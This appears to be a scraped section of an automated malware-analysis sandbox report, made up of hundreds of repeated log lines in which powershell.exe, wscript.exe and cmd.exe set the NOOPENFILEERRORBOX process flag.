        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
